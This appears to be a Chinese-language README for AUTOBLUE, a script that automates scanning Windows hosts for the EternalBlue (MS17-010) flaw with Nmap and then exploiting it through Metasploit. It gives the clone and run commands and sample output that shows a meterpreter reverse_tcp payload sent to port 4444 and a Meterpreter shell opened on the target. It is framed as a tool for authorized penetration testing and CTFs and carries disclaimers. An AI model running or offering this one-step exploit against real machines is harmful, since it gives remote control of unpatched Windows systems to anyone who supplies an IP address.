AUTOBLUE 是一款自动化工具,用于利用 Windows 计算机上的 EternalBlue 漏洞(CVE-2017-0144)。该工具集成了 Nmap 的漏洞扫描能力和 Metasploit 的 msfconsole 进行漏洞利用,使用户能够自动识别易受攻击的系统并启动 EternalBlue 漏洞利用,从而获得对目标的远程访问权限。
本工具主要面向在受控、授权环境中工作的安全专业人员、渗透测试人员和道德黑客,例如 Capture The Flag(CTF)挑战、渗透测试任务或实验环境。AUTOBLUE 让用户只需输入目标 IP 地址,即可以最少的手动干预来利用 EternalBlue 漏洞。
功能
自动化漏洞扫描: 使用 Nmap 扫描目标计算机上的 EternalBlue 漏洞(CVE-2017-0144)。
无缝漏洞利用: 自动利用 Metasploit 的 msfconsole 启动 EternalBlue 漏洞利用。
简单设置: 只需目标 IP 地址以及安装了 Nmap 和 Metasploit 的工作环境。
输出报告: 生成指示漏洞利用尝试成功或失败的输出。
目录
先决条件
安装
使用
工作原理
安全注意事项
贡献
许可证
致谢
免责声明
先决条件:
在使用 AUTOBLUE 之前,请确保您的计算机上已安装以下工具:
Nmap: 用于检测易受攻击计算机的网络扫描工具。
Metasploit 框架: 一个包含 EternalBlue 漏洞利用的渗透测试平台。
安装 Nmap:
复制代码
sudo apt update
和
sudo apt install nmap
在 Windows 或 macOS 上,从官方网站下载 Nmap。
安装 Metasploit:
在 Linux(基于 Debian)上:
复制代码
sudo apt update
和
sudo apt install metasploit-framework
在 Windows 或 macOS 上,从官方网站下载 Metasploit。
安装:
要安装 AUTOBLUE,请执行以下步骤:
克隆仓库:
git clone https://github.com/AtithKhawas/autoblue.git
以及
cd autoblue
确保 Nmap 和 Metasploit 已正确安装为先决条件。
赋予脚本可执行权限:
chmod +x autoblue.sh
使用:
AUTOBLUE 旨在自动扫描和利用 EternalBlue 漏洞。以下是使用方法:
要使用 AUTOBLUE,请在终端中运行以下命令:
复制代码
./autoblue.sh
输出:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
它会要求输入目标 IP 地址和您的 IP 地址。
示例
Enter Target IP Address: Target<IP Address>
Enter Your IP Address: Your <IP Address>
运行工具后,它将开始使用 Nmap 进行扫描:
输出-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
这就是真正工作开始的地方,大大缩短了耗时的过程。如果目标易受攻击,它会自动启动 Msfconsole 并设置 RHOSTS、PAYLOAD、LHOST 和 LPORT,默认端口为 4444。
输出-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
然后为我们提供目标的 Meterpreter Shell。
输出-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
工作原理:
Nmap 脚本扫描: 该工具首先使用 Nmap 脚本扫描(--script smb-vuln-ms17-010) 检测目标计算机是否容易受到 EternalBlue 漏洞利用的影响。它检查端口 445 是否开放,并尝试识别 SMB 漏洞。
Metasploit 漏洞利用: 如果发现目标计算机易受攻击,AUTOBLUE 将继续使用 Metasploit 的 msfconsole 启动 EternalBlue 漏洞利用。脚本将配置并发送必要的载荷以利用该漏洞。
反弹 Shell: 如果漏洞利用成功,将打开一个反弹 Shell,以提供受害者计算机上的命令行界面。
反馈: 该工具在整个过程中提供反馈,包括目标是否成功被利用,并输出任何相关信息(例如,反弹 Shell 的 IP 地址)。
安全注意事项:
合法使用: 此工具仅应在 授权环境 中使用。确保您拥有明确许可来测试目标计算机,并且在您所在的司法管辖区内这样做是合法的。
用户输入: 确保仅将受信任的 IP 输入到工具中,以防止误用。在不可信系统上运行此工具可能导致安全事件。
载荷安全: 此工具中使用的反弹 Shell 载荷本身具有风险。请勿将攻击计算机或其侦听器暴露于不可信网络。
保持依赖项更新: 确保定期更新 Nmap 和 Metasploit,以缓解这些工具中已知的安全漏洞。
贡献:
欢迎对 AUTOBLUE 项目做出贡献。如果您有任何建议、改进或错误修复,请随时复刻仓库并创建拉取请求。
许可证:
此工具是开源的,并根据 MIT 许可证分发。您可以自由地在自己的项目中使用、修改和分发该软件。但是,您必须在所有副本或软件的重要部分中包含此声明。
致谢:
Nmap: 提供了必要的漏洞扫描功能。
Metasploit: 提供了利用 EternalBlue 漏洞的框架。
安全研究人员: 发现并公开披露了 EternalBlue 漏洞,这有助于全球系统的安全。
免责声明:
AUTOBLUE 是一款仅用于教育和道德用途的工具。作者对使用此工具进行的任何非法行为不承担任何责任。您有责任确保拥有对任何系统进行渗透测试的明确许可。
请自行承担使用风险。始终在安全合法的环境中进行渗透测试活动。